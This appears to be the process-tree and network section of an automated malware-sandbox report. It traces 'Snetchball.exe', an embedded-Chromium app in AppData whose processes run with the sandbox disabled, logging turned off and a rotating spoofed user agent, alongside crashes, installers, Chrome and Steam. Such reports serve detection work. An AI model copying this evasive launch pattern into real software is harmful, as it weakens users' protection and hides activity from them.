"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4004 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2948 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2980 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3368 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4292 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2964 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4200 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3876 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1820 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2372

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5436 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4760 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

\??\E:\setup.exe

"E:\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp" /SL5="$50410,3687301,168448,E:\setup.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004CC

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1044

F:\Games\The Longing\The Longing.exe

"F:\Games\The Longing\The Longing.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

F:\Games\The Longing\The Longing.exe

"F:\Games\The Longing\The Longing.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5064 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2388

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc731cc40,0x7fffc731cc4c,0x7fffc731cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3076,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3300,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3836,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3876 /prefetch:2

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3556,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3536 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4400,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4356,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3232,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3256,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4736,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5104,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3372,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3396,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3380,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:8

C:\Users\Admin\Downloads\SteamSetup.exe

"C:\Users\Admin\Downloads\SteamSetup.exe"

C:\Program Files (x86)\Steam\bin\steamservice.exe

"C:\Program Files (x86)\Steam\bin\steamservice.exe" /Install

C:\Program Files (x86)\Steam\steam.exe

"C:\Program Files (x86)\Steam\steam.exe"

Network

Country Destination Domain Proto
US 4.227.249.197:443 u.clarity.ms tcp
